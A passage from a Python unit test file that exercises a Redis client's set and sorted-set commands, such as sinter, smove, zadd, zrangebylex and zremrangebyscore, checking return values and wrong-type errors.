self.assertEqual(self.redis.sdiff('foo'), set())
def test_sdiff_wrong_type(self):
self.redis.zadd('foo', 1, 'member')
self.redis.sadd('bar', 'member')
with self.assertRaises(redis.ResponseError):
self.redis.sdiff('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.sdiff('bar', 'foo')
def test_sdiffstore(self):
self.redis.sadd('foo', 'member1')
self.redis.sadd('foo', 'member2')
self.redis.sadd('bar', 'member2')
self.redis.sadd('bar', 'member3')
self.assertEqual(self.redis.sdiffstore('baz', 'foo', 'bar'), 1)
# Catch instances where we store bytes and strings inconsistently
# and thus baz = {'member1', b'member1'}
self.redis.sadd('baz', 'member1')
self.assertEqual(self.redis.scard('baz'), 1)
def test_setrange(self):
self.redis.set('foo', 'test')
self.assertEqual(self.redis.setrange('foo', 1, 'aste'), 5)
self.assertEqual(self.redis.get('foo'), b'taste')
self.redis.set('foo', 'test')
self.assertEqual(self.redis.setrange('foo', 1, 'a'), 4)
self.assertEqual(self.redis.get('foo'), b'tast')
self.assertEqual(self.redis.setrange('bar', 2, 'test'), 6)
self.assertEqual(self.redis.get('bar'), b'\x00\x00test')
def test_setrange_expiry(self):
self.redis.set('foo', 'test', ex=10)
self.redis.setrange('foo', 1, 'aste')
self.assertGreater(self.redis.ttl('foo'), 0)
def test_sinter(self):
self.redis.sadd('foo', 'member1')
self.redis.sadd('foo', 'member2')
self.redis.sadd('bar', 'member2')
self.redis.sadd('bar', 'member3')
self.assertEqual(self.redis.sinter('foo', 'bar'), set([b'member2']))
self.assertEqual(self.redis.sinter('foo'),
set([b'member1', b'member2']))
def test_sinter_bytes_keys(self):
foo = os.urandom(10)
bar = os.urandom(10)
self.redis.sadd(foo, 'member1')
self.redis.sadd(foo, 'member2')
self.redis.sadd(bar, 'member2')
self.redis.sadd(bar, 'member3')
self.assertEqual(self.redis.sinter(foo, bar), set([b'member2']))
self.assertEqual(self.redis.sinter(foo), set([b'member1', b'member2']))
def test_sinter_wrong_type(self):
self.redis.zadd('foo', 1, 'member')
self.redis.sadd('bar', 'member')
with self.assertRaises(redis.ResponseError):
self.redis.sinter('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.sinter('bar', 'foo')
def test_sinterstore(self):
self.redis.sadd('foo', 'member1')
self.redis.sadd('foo', 'member2')
self.redis.sadd('bar', 'member2')
self.redis.sadd('bar', 'member3')
self.assertEqual(self.redis.sinterstore('baz', 'foo', 'bar'), 1)
# Catch instances where we store bytes and strings inconsistently
# and thus baz = {'member2', b'member2'}
self.redis.sadd('baz', 'member2')
self.assertEqual(self.redis.scard('baz'), 1)
def test_sismember(self):
self.assertEqual(self.redis.sismember('foo', 'member1'), False)
self.redis.sadd('foo', 'member1')
self.assertEqual(self.redis.sismember('foo', 'member1'), True)
def test_sismember_wrong_type(self):
self.redis.zadd('foo', 1, 'member')
with self.assertRaises(redis.ResponseError):
self.redis.sismember('foo', 'member')
def test_smembers(self):
self.assertEqual(self.redis.smembers('foo'), set())
def test_smembers_copy(self):
self.redis.sadd('foo', 'member1')
members_before = self.redis.smembers('foo')
self.redis.sadd('foo', 'member2')
self.assertNotEqual(members_before, self.redis.smembers('foo'))
def test_smembers_wrong_type(self):
self.redis.zadd('foo', 1, 'member')
with self.assertRaises(redis.ResponseError):
self.redis.smembers('foo')
def test_smembers_runtime_error(self):
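# smembers should return a copy, so removing members while iterating
# over the result must not raise a RuntimeError.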
self.redis.sadd('foo', 'member1', 'member2')
for member in self.redis.smembers('foo'):
self.redis.srem('foo', member)
def test_smove(self):
self.redis.sadd('foo', 'member1')
self.redis.sadd('foo', 'member2')
self.assertEqual(self.redis.smove('foo', 'bar', 'member1'), True)
self.assertEqual(self.redis.smembers('bar'), set([b'member1']))
def test_smove_non_existent_key(self):
self.assertEqual(self.redis.smove('foo', 'bar', 'member1'), False)
def test_move_wrong_type(self):
self.redis.zadd('foo', 1, 'member')
self.redis.sadd('bar', 'member')
with self.assertRaises(redis.ResponseError):
self.redis.smove('bar', 'foo', 'member')
# Must raise the error before removing member from bar
self.assertEqual(self.redis.smembers('bar'), set([b'member']))
with self.assertRaises(redis.ResponseError):
self.redis.smove('foo', 'bar', 'member')
def test_spop(self):
# This is tricky because it pops a random element.
self.redis.sadd('foo', 'member1')
self.assertEqual(self.redis.spop('foo'), b'member1')
self.assertEqual(self.redis.spop('foo'), None)
def test_spop_wrong_type(self):
self.redis.zadd('foo', 1, 'member')
with self.assertRaises(redis.ResponseError):
self.redis.spop('foo')
def test_srandmember(self):
self.redis.sadd('foo', 'member1')
self.assertEqual(self.redis.srandmember('foo'), b'member1')
# Shouldn't be removed from the set.
self.assertEqual(self.redis.srandmember('foo'), b'member1')
def test_srandmember_number(self):
"""srandmember works with the number argument."""
self.assertEqual(self.redis.srandmember('foo', 2), [])
self.redis.sadd('foo', b'member1')
self.assertEqual(self.redis.srandmember('foo', 2), [b'member1'])
self.redis.sadd('foo', b'member2')
self.assertEqual(set(self.redis.srandmember('foo', 2)),
set([b'member1', b'member2']))
self.redis.sadd('foo', b'member3')
res = self.redis.srandmember('foo', 2)
self.assertEqual(len(res), 2)
if self.decode_responses:
superset = set(['member1', 'member2', 'member3'])
else:
superset = set([b'member1', b'member2', b'member3'])
for e in res:
self.assertIn(e, superset)
def test_srandmember_wrong_type(self):
self.redis.zadd('foo', 1, 'member')
with self.assertRaises(redis.ResponseError):
self.redis.srandmember('foo')
def test_srem(self):
self.redis.sadd('foo', 'member1', 'member2', 'member3', 'member4')
self.assertEqual(self.redis.smembers('foo'),
set([b'member1', b'member2', b'member3', b'member4']))
self.assertEqual(self.redis.srem('foo', 'member1'), True)
self.assertEqual(self.redis.smembers('foo'),
set([b'member2', b'member3', b'member4']))
self.assertEqual(self.redis.srem('foo', 'member1'), False)
# Since redis >= 2.7.6, srem returns the number of deleted items.
self.assertEqual(self.redis.srem('foo', 'member2', 'member3'), 2)
self.assertEqual(self.redis.smembers('foo'), set([b'member4']))
self.assertEqual(self.redis.srem('foo', 'member3', 'member4'), True)
self.assertEqual(self.redis.smembers('foo'), set([]))
self.assertEqual(self.redis.srem('foo', 'member3', 'member4'), False)
def test_srem_wrong_type(self):
self.redis.zadd('foo', 1, 'member')
with self.assertRaises(redis.ResponseError):
self.redis.srem('foo', 'member')
def test_sunion(self):
self.redis.sadd('foo', 'member1')
self.redis.sadd('foo', 'member2')
self.redis.sadd('bar', 'member2')
self.redis.sadd('bar', 'member3')
self.assertEqual(self.redis.sunion('foo', 'bar'),
set([b'member1', b'member2', b'member3']))
def test_sunion_wrong_type(self):
self.redis.zadd('foo', 1, 'member')
self.redis.sadd('bar', 'member')
with self.assertRaises(redis.ResponseError):
self.redis.sunion('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.sunion('bar', 'foo')
def test_sunionstore(self):
self.redis.sadd('foo', 'member1')
self.redis.sadd('foo', 'member2')
self.redis.sadd('bar', 'member2')
self.redis.sadd('bar', 'member3')
self.assertEqual(self.redis.sunionstore('baz', 'foo', 'bar'), 3)
self.assertEqual(self.redis.smembers('baz'),
set([b'member1', b'member2', b'member3']))
# Catch instances where we store bytes and strings inconsistently
# and thus baz = {b'member1', b'member2', b'member3', 'member3'}
self.redis.sadd('baz', 'member3')
self.assertEqual(self.redis.scard('baz'), 3)
def test_empty_set(self):
self.redis.sadd('foo', 'bar')
self.redis.srem('foo', 'bar')
self.assertFalse(self.redis.exists('foo'))
def test_zadd(self):
self.redis.zadd('foo', four=4)
self.redis.zadd('foo', three=3)
self.assertEqual(self.redis.zadd('foo', 2, 'two', 1, 'one', zero=0), 3)
self.assertEqual(self.redis.zrange('foo', 0, -1),
[b'zero', b'one', b'two', b'three', b'four'])
self.assertEqual(self.redis.zadd('foo', 7, 'zero', one=1, five=5), 1)
self.assertEqual(self.redis.zrange('foo', 0, -1),
[b'one', b'two', b'three', b'four', b'five', b'zero'])
def test_zadd_uses_str(self):
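# Non-string members are stored as the bytes of their str() representation.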
self.redis.zadd('foo', 12345, (1, 2, 3))
self.assertEqual(self.redis.zrange('foo', 0, 0), [b'(1, 2, 3)'])
def test_zadd_errors(self):
# The args are backwards (it should be 2, "two"), so we
# expect an exception to be raised.
with self.assertRaises(redis.ResponseError):
self.redis.zadd('foo', 'two', 2)
with self.assertRaises(redis.ResponseError):
self.redis.zadd('foo', two='two')
# An equal number of values and scores is expected.
with self.assertRaises(redis.RedisError):
self.redis.zadd('foo', 'two')
# Have to add at least one key/value pair
with self.assertRaises(redis.ResponseError):
self.redis.zadd('foo')
def test_zadd_wrong_type(self):
self.redis.sadd('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zadd('foo', 2, 'two')
def test_zadd_multiple(self):
self.redis.zadd('foo', 1, 'one', 2, 'two')
self.assertEqual(self.redis.zrange('foo', 0, 0),
[b'one'])
self.assertEqual(self.redis.zrange('foo', 1, 1),
[b'two'])
def test_zrange_same_score(self):
self.redis.zadd('foo', two_a=2)
self.redis.zadd('foo', two_b=2)
self.redis.zadd('foo', two_c=2)
self.redis.zadd('foo', two_d=2)
self.redis.zadd('foo', two_e=2)
self.assertEqual(self.redis.zrange('foo', 2, 3),
[b'two_c', b'two_d'])
def test_zcard(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.assertEqual(self.redis.zcard('foo'), 2)
def test_zcard_non_existent_key(self):
self.assertEqual(self.redis.zcard('foo'), 0)
def test_zcard_wrong_type(self):
self.redis.sadd('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zcard('foo')
def test_zcount(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', three=2)
self.redis.zadd('foo', five=5)
self.assertEqual(self.redis.zcount('foo', 2, 4), 1)
self.assertEqual(self.redis.zcount('foo', 1, 4), 2)
self.assertEqual(self.redis.zcount('foo', 0, 5), 3)
self.assertEqual(self.redis.zcount('foo', 4, '+inf'), 1)
self.assertEqual(self.redis.zcount('foo', '-inf', 4), 2)
self.assertEqual(self.redis.zcount('foo', '-inf', '+inf'), 3)
def test_zcount_exclusive(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', three=2)
self.redis.zadd('foo', five=5)
self.assertEqual(self.redis.zcount('foo', '-inf', '(2'), 1)
self.assertEqual(self.redis.zcount('foo', '-inf', 2), 2)
self.assertEqual(self.redis.zcount('foo', '(5', '+inf'), 0)
self.assertEqual(self.redis.zcount('foo', '(1', 5), 2)
self.assertEqual(self.redis.zcount('foo', '(2', '(5'), 0)
self.assertEqual(self.redis.zcount('foo', '(1', '(5'), 1)
self.assertEqual(self.redis.zcount('foo', 2, '(5'), 1)
def test_zcount_wrong_type(self):
self.redis.sadd('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zcount('foo', '-inf', '+inf')
def test_zincrby(self):
self.redis.zadd('foo', one=1)
self.assertEqual(self.redis.zincrby('foo', 'one', 10), 11)
self.assertEqual(self.redis.zrange('foo', 0, -1, withscores=True),
[(b'one', 11)])
def test_zincrby_wrong_type(self):
self.redis.sadd('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zincrby('foo', 'one', 10)
def test_zrange_descending(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', three=3)
self.assertEqual(self.redis.zrange('foo', 0, -1, desc=True),
[b'three', b'two', b'one'])
def test_zrange_descending_with_scores(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', three=3)
self.assertEqual(self.redis.zrange('foo', 0, -1, desc=True,
withscores=True),
[(b'three', 3), (b'two', 2), (b'one', 1)])
def test_zrange_with_positive_indices(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', three=3)
self.assertEqual(self.redis.zrange('foo', 0, 1), [b'one', b'two'])
def test_zrange_wrong_type(self):
self.redis.sadd('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zrange('foo', 0, -1)
def test_zrange_score_cast(self):
self.redis.zadd('foo', one=1.2)
self.redis.zadd('foo', two=2.2)
expected_without_cast_round = [(b'one', 1.2), (b'two', 2.2)]
expected_with_cast_round = [(b'one', 1.0), (b'two', 2.0)]
self.assertEqual(self.redis.zrange('foo', 0, 2, withscores=True),
expected_without_cast_round)
self.assertEqual(self.redis.zrange('foo', 0, 2, withscores=True,
score_cast_func=self._round_str),
expected_with_cast_round)
def test_zrank(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', three=3)
self.assertEqual(self.redis.zrank('foo', 'one'), 0)
self.assertEqual(self.redis.zrank('foo', 'two'), 1)
self.assertEqual(self.redis.zrank('foo', 'three'), 2)
def test_zrank_non_existent_member(self):
self.assertEqual(self.redis.zrank('foo', 'one'), None)
def test_zrank_wrong_type(self):
self.redis.sadd('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zrank('foo', 'one')
def test_zrem(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', three=3)
self.redis.zadd('foo', four=4)
self.assertEqual(self.redis.zrem('foo', 'one'), True)
self.assertEqual(self.redis.zrange('foo', 0, -1),
[b'two', b'three', b'four'])
# Since redis >= 2.7.6, zrem returns the number of deleted items.
self.assertEqual(self.redis.zrem('foo', 'two', 'three'), 2)
self.assertEqual(self.redis.zrange('foo', 0, -1), [b'four'])
self.assertEqual(self.redis.zrem('foo', 'three', 'four'), True)
self.assertEqual(self.redis.zrange('foo', 0, -1), [])
self.assertEqual(self.redis.zrem('foo', 'three', 'four'), False)
def test_zrem_non_existent_member(self):
self.assertFalse(self.redis.zrem('foo', 'one'))
def test_zrem_numeric_member(self):
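# Numeric arguments to zrem should match members stored as strings.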
self.redis.zadd('foo', **{'128': 13.0, '129': 12.0})
self.assertEqual(self.redis.zrem('foo', 128), True)
self.assertEqual(self.redis.zrange('foo', 0, -1), [b'129'])
def test_zrem_wrong_type(self):
self.redis.sadd('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zrem('foo', 'bar')
def test_zscore(self):
self.redis.zadd('foo', one=54)
self.assertEqual(self.redis.zscore('foo', 'one'), 54)
def test_zscore_non_existent_member(self):
self.assertIsNone(self.redis.zscore('foo', 'one'))
def test_zscore_wrong_type(self):
self.redis.sadd('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zscore('foo', 'one')
def test_zrevrank(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', three=3)
self.assertEqual(self.redis.zrevrank('foo', 'one'), 2)
self.assertEqual(self.redis.zrevrank('foo', 'two'), 1)
self.assertEqual(self.redis.zrevrank('foo', 'three'), 0)
def test_zrevrank_non_existent_member(self):
self.assertEqual(self.redis.zrevrank('foo', 'one'), None)
def test_zrevrank_wrong_type(self):
self.redis.sadd('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zrevrank('foo', 'one')
def test_zrevrange(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', three=3)
self.assertEqual(self.redis.zrevrange('foo', 0, 1), [b'three', b'two'])
self.assertEqual(self.redis.zrevrange('foo', 0, -1),
[b'three', b'two', b'one'])
def test_zrevrange_sorted_keys(self):
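# Members with equal scores are ordered lexicographically, so the reverse
# range returns 'two_b' before 'two'.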
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', 2, 'two_b')
self.redis.zadd('foo', three=3)
self.assertEqual(self.redis.zrevrange('foo', 0, 2),
[b'three', b'two_b', b'two'])
self.assertEqual(self.redis.zrevrange('foo', 0, -1),
[b'three', b'two_b', b'two', b'one'])
def test_zrevrange_wrong_type(self):
self.redis.sadd('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zrevrange('foo', 0, 2)
def test_zrevrange_score_cast(self):
self.redis.zadd('foo', one=1.2)
self.redis.zadd('foo', two=2.2)
expected_without_cast_round = [(b'two', 2.2), (b'one', 1.2)]
expected_with_cast_round = [(b'two', 2.0), (b'one', 1.0)]
self.assertEqual(self.redis.zrevrange('foo', 0, 2, withscores=True),
expected_without_cast_round)
self.assertEqual(self.redis.zrevrange('foo', 0, 2, withscores=True,
score_cast_func=self._round_str),
expected_with_cast_round)
def test_zrangebyscore(self):
self.redis.zadd('foo', zero=0)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', two_a_also=2)
self.redis.zadd('foo', two_b_also=2)
self.redis.zadd('foo', four=4)
self.assertEqual(self.redis.zrangebyscore('foo', 1, 3),
[b'two', b'two_a_also', b'two_b_also'])
self.assertEqual(self.redis.zrangebyscore('foo', 2, 3),
[b'two', b'two_a_also', b'two_b_also'])
self.assertEqual(self.redis.zrangebyscore('foo', 0, 4),
[b'zero', b'two', b'two_a_also', b'two_b_also',
b'four'])
self.assertEqual(self.redis.zrangebyscore('foo', '-inf', 1),
[b'zero'])
self.assertEqual(self.redis.zrangebyscore('foo', 2, '+inf'),
[b'two', b'two_a_also', b'two_b_also', b'four'])
self.assertEqual(self.redis.zrangebyscore('foo', '-inf', '+inf'),
[b'zero', b'two', b'two_a_also', b'two_b_also',
b'four'])
def test_zrangebyscore_exclusive(self):
self.redis.zadd('foo', zero=0)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', four=4)
self.redis.zadd('foo', five=5)
self.assertEqual(self.redis.zrangebyscore('foo', '(0', 6),
[b'two', b'four', b'five'])
self.assertEqual(self.redis.zrangebyscore('foo', '(2', '(5'),
[b'four'])
self.assertEqual(self.redis.zrangebyscore('foo', 0, '(4'),
[b'zero', b'two'])
def test_zrangebyscore_raises_error(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', three=3)
with self.assertRaises(redis.ResponseError):
self.redis.zrangebyscore('foo', 'one', 2)
with self.assertRaises(redis.ResponseError):
self.redis.zrangebyscore('foo', 2, 'three')
with self.assertRaises(redis.ResponseError):
self.redis.zrangebyscore('foo', 2, '3)')
with self.assertRaises(redis.RedisError):
self.redis.zrangebyscore('foo', 2, '3)', 0, None)
def test_zrangebyscore_wrong_type(self):
self.redis.sadd('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zrangebyscore('foo', '(1', '(2')
def test_zrangebyscore_slice(self):
self.redis.zadd('foo', two_a=2)
self.redis.zadd('foo', two_b=2)
self.redis.zadd('foo', two_c=2)
self.redis.zadd('foo', two_d=2)
self.assertEqual(self.redis.zrangebyscore('foo', 0, 4, 0, 2),
[b'two_a', b'two_b'])
self.assertEqual(self.redis.zrangebyscore('foo', 0, 4, 1, 3),
[b'two_b', b'two_c', b'two_d'])
def test_zrangebyscore_withscores(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', three=3)
self.assertEqual(self.redis.zrangebyscore('foo', 1, 3, 0, 2, True),
[(b'one', 1), (b'two', 2)])
def test_zrangebyscore_cast_scores(self):
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', two_a_also=2.2)
expected_without_cast_round = [(b'two', 2.0), (b'two_a_also', 2.2)]
expected_with_cast_round = [(b'two', 2.0), (b'two_a_also', 2.0)]
self.assertItemsEqual(
self.redis.zrangebyscore('foo', 2, 3, withscores=True),
expected_without_cast_round
)
self.assertItemsEqual(
self.redis.zrangebyscore('foo', 2, 3, withscores=True,
score_cast_func=self._round_str),
expected_with_cast_round
)
def test_zrevrangebyscore(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', three=3)
self.assertEqual(self.redis.zrevrangebyscore('foo', 3, 1),
[b'three', b'two', b'one'])
self.assertEqual(self.redis.zrevrangebyscore('foo', 3, 2),
[b'three', b'two'])
self.assertEqual(self.redis.zrevrangebyscore('foo', 3, 1, 0, 1),
[b'three'])
self.assertEqual(self.redis.zrevrangebyscore('foo', 3, 1, 1, 2),
[b'two', b'one'])
def test_zrevrangebyscore_exclusive(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', three=3)
self.assertEqual(self.redis.zrevrangebyscore('foo', '(3', 1),
[b'two', b'one'])
self.assertEqual(self.redis.zrevrangebyscore('foo', 3, '(2'),
[b'three'])
self.assertEqual(self.redis.zrevrangebyscore('foo', '(3', '(1'),
[b'two'])
self.assertEqual(self.redis.zrevrangebyscore('foo', '(2', 1, 0, 1),
[b'one'])
self.assertEqual(self.redis.zrevrangebyscore('foo', '(2', '(1', 0, 1),
[])
self.assertEqual(self.redis.zrevrangebyscore('foo', '(3', '(0', 1, 2),
[b'one'])
def test_zrevrangebyscore_raises_error(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', three=3)
with self.assertRaises(redis.ResponseError):
self.redis.zrevrangebyscore('foo', 'three', 1)
with self.assertRaises(redis.ResponseError):
self.redis.zrevrangebyscore('foo', 3, 'one')
with self.assertRaises(redis.ResponseError):
self.redis.zrevrangebyscore('foo', 3, '1)')
with self.assertRaises(redis.ResponseError):
self.redis.zrevrangebyscore('foo', '((3', '1)')
def test_zrevrangebyscore_wrong_type(self):
self.redis.sadd('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zrevrangebyscore('foo', '(3', '(1')
def test_zrevrangebyscore_cast_scores(self):
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', two_a_also=2.2)
expected_without_cast_round = [(b'two_a_also', 2.2), (b'two', 2.0)]
expected_with_cast_round = [(b'two_a_also', 2.0), (b'two', 2.0)]
self.assertEqual(
self.redis.zrevrangebyscore('foo', 3, 2, withscores=True),
expected_without_cast_round
)
self.assertEqual(
self.redis.zrevrangebyscore('foo', 3, 2, withscores=True,
score_cast_func=self._round_str),
expected_with_cast_round
)
def test_zrangebylex(self):
self.redis.zadd('foo', one_a=0)
self.redis.zadd('foo', two_a=0)
self.redis.zadd('foo', two_b=0)
self.redis.zadd('foo', three_a=0)
self.assertEqual(self.redis.zrangebylex('foo', b'(t', b'+'),
[b'three_a', b'two_a', b'two_b'])
self.assertEqual(self.redis.zrangebylex('foo', b'(t', b'[two_b'),
[b'three_a', b'two_a', b'two_b'])
self.assertEqual(self.redis.zrangebylex('foo', b'(t', b'(two_b'),
[b'three_a', b'two_a'])
self.assertEqual(self.redis.zrangebylex('foo', b'[three_a', b'[two_b'),
[b'three_a', b'two_a', b'two_b'])
self.assertEqual(self.redis.zrangebylex('foo', b'(three_a', b'[two_b'),
[b'two_a', b'two_b'])
self.assertEqual(self.redis.zrangebylex('foo', b'-', b'(two_b'),
[b'one_a', b'three_a', b'two_a'])
self.assertEqual(self.redis.zrangebylex('foo', b'[two_b', b'(two_b'),
[])
# Reversed max (+) and min (-) boundaries:
# these are always empty, but allowed by redis.
self.assertEqual(self.redis.zrangebylex('foo', b'+', b'-'),
[])
self.assertEqual(self.redis.zrangebylex('foo', b'+', b'[three_a'),
[])
self.assertEqual(self.redis.zrangebylex('foo', b'[o', b'-'),
[])
def test_zrangebylex_wrong_type(self):
self.redis.sadd('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zrangebylex('foo', b'-', b'+')
def test_zlexcount(self):
self.redis.zadd('foo', one_a=0)
self.redis.zadd('foo', two_a=0)
self.redis.zadd('foo', two_b=0)
self.redis.zadd('foo', three_a=0)
self.assertEqual(self.redis.zlexcount('foo', b'(t', b'+'),
3)
self.assertEqual(self.redis.zlexcount('foo', b'(t', b'[two_b'),
3)
self.assertEqual(self.redis.zlexcount('foo', b'(t', b'(two_b'),
2)
self.assertEqual(self.redis.zlexcount('foo', b'[three_a', b'[two_b'),
3)
self.assertEqual(self.redis.zlexcount('foo', b'(three_a', b'[two_b'),
2)
self.assertEqual(self.redis.zlexcount('foo', b'-', b'(two_b'),
3)
self.assertEqual(self.redis.zlexcount('foo', b'[two_b', b'(two_b'),
0)
# Reversed max (+) and min (-) boundaries:
# these are always empty, but allowed by redis.
self.assertEqual(self.redis.zlexcount('foo', b'+', b'-'),
0)
self.assertEqual(self.redis.zlexcount('foo', b'+', b'[three_a'),
0)
self.assertEqual(self.redis.zlexcount('foo', b'[o', b'-'),
0)
def test_zlexcount_wrong_type(self):
self.redis.sadd('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zlexcount('foo', b'-', b'+')
def test_zrangebylex_with_limit(self):
self.redis.zadd('foo', one_a=0)
self.redis.zadd('foo', two_a=0)
self.redis.zadd('foo', two_b=0)
self.redis.zadd('foo', three_a=0)
self.assertEqual(self.redis.zrangebylex('foo', b'-', b'+', 1, 2),
[b'three_a', b'two_a'])
# A negative offset yields no results.
self.assertEqual(self.redis.zrangebylex('foo', b'-', b'+', -1, 3),
[])
# A negative limit means no limit: everything from the offset onward is returned.
self.assertEqual(self.redis.zrangebylex('foo', b'-', b'+', 0, -2),
[b'one_a', b'three_a', b'two_a', b'two_b'])
self.assertEqual(self.redis.zrangebylex('foo', b'-', b'+', 1, -2),
[b'three_a', b'two_a', b'two_b'])
self.assertEqual(self.redis.zrangebylex('foo', b'+', b'-', 1, 1),
[])
def test_zrangebylex_raises_error(self):
self.redis.zadd('foo', one_a=0)
self.redis.zadd('foo', two_a=0)
self.redis.zadd('foo', two_b=0)
self.redis.zadd('foo', three_a=0)
with self.assertRaises(redis.ResponseError):
self.redis.zrangebylex('foo', b'', b'[two_b')
with self.assertRaises(redis.ResponseError):
self.redis.zrangebylex('foo', b'-', b'two_b')
with self.assertRaises(redis.ResponseError):
self.redis.zrangebylex('foo', b'(t', b'two_b')
with self.assertRaises(redis.ResponseError):
self.redis.zrangebylex('foo', b't', b'+')
with self.assertRaises(redis.ResponseError):
self.redis.zrangebylex('foo', b'[two_a', b'')
with self.assertRaises(redis.RedisError):
self.redis.zrangebylex('foo', b'(two_a', b'[two_b', 1)
def test_zrevrangebylex(self):
self.redis.zadd('foo', one_a=0)
self.redis.zadd('foo', two_a=0)
self.redis.zadd('foo', two_b=0)
self.redis.zadd('foo', three_a=0)
self.assertEqual(self.redis.zrevrangebylex('foo', b'+', b'(t'),
[b'two_b', b'two_a', b'three_a'])
self.assertEqual(self.redis.zrevrangebylex('foo', b'[two_b', b'(t'),
[b'two_b', b'two_a', b'three_a'])
self.assertEqual(self.redis.zrevrangebylex('foo', b'(two_b', b'(t'),
[b'two_a', b'three_a'])
self.assertEqual(self.redis.zrevrangebylex('foo', b'[two_b', b'[three_a'),
[b'two_b', b'two_a', b'three_a'])
self.assertEqual(self.redis.zrevrangebylex('foo', b'[two_b', b'(three_a'),
[b'two_b', b'two_a'])
self.assertEqual(self.redis.zrevrangebylex('foo', b'(two_b', b'-'),
[b'two_a', b'three_a', b'one_a'])
self.assertEqual(self.redis.zrangebylex('foo', b'(two_b', b'[two_b'),
[])
# Reversed max (+) and min (-) boundaries:
# these are always empty, but allowed by redis.
self.assertEqual(self.redis.zrevrangebylex('foo', b'-', b'+'),
[])
self.assertEqual(self.redis.zrevrangebylex('foo', b'[three_a', b'+'),
[])
self.assertEqual(self.redis.zrevrangebylex('foo', b'-', b'[o'),
[])
def test_zrevrangebylex_with_limit(self):
self.redis.zadd('foo', one_a=0)
self.redis.zadd('foo', two_a=0)
self.redis.zadd('foo', two_b=0)
self.redis.zadd('foo', three_a=0)
self.assertEqual(self.redis.zrevrangebylex('foo', b'+', b'-', 1, 2),
[b'two_a', b'three_a'])
def test_zrevrangebylex_raises_error(self):
self.redis.zadd('foo', one_a=0)
self.redis.zadd('foo', two_a=0)
self.redis.zadd('foo', two_b=0)
self.redis.zadd('foo', three_a=0)
with self.assertRaises(redis.ResponseError):
self.redis.zrevrangebylex('foo', b'[two_b', b'')
with self.assertRaises(redis.ResponseError):
self.redis.zrevrangebylex('foo', b'two_b', b'-')
with self.assertRaises(redis.ResponseError):
self.redis.zrevrangebylex('foo', b'two_b', b'(t')
with self.assertRaises(redis.ResponseError):
self.redis.zrevrangebylex('foo', b'+', b't')
with self.assertRaises(redis.ResponseError):
self.redis.zrevrangebylex('foo', b'', b'[two_a')
with self.assertRaises(redis.RedisError):
self.redis.zrevrangebylex('foo', b'[two_a', b'(two_b', 1)
def test_zrevrangebylex_wrong_type(self):
self.redis.sadd('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zrevrangebylex('foo', b'+', b'-')
def test_zremrangebyrank(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', three=3)
self.assertEqual(self.redis.zremrangebyrank('foo', 0, 1), 2)
self.assertEqual(self.redis.zrange('foo', 0, -1), [b'three'])
def test_zremrangebyrank_negative_indices(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', three=3)
self.assertEqual(self.redis.zremrangebyrank('foo', -2, -1), 2)
self.assertEqual(self.redis.zrange('foo', 0, -1), [b'one'])
def test_zremrangebyrank_out_of_bounds(self):
self.redis.zadd('foo', one=1)
self.assertEqual(self.redis.zremrangebyrank('foo', 1, 3), 0)
def test_zremrangebyrank_wrong_type(self):
self.redis.sadd('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zremrangebyrank('foo', 1, 3)
def test_zremrangebyscore(self):
self.redis.zadd('foo', zero=0)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', four=4)
# Outside of range.
self.assertEqual(self.redis.zremrangebyscore('foo', 5, 10), 0)
self.assertEqual(self.redis.zrange('foo', 0, -1),
[b'zero', b'two', b'four'])
# Middle of range.
self.assertEqual(self.redis.zremrangebyscore('foo', 1, 3), 1)
self.assertEqual(self.redis.zrange('foo', 0, -1), [b'zero', b'four'])
self.assertEqual(self.redis.zremrangebyscore('foo', 1, 3), 0)
# Entire range.
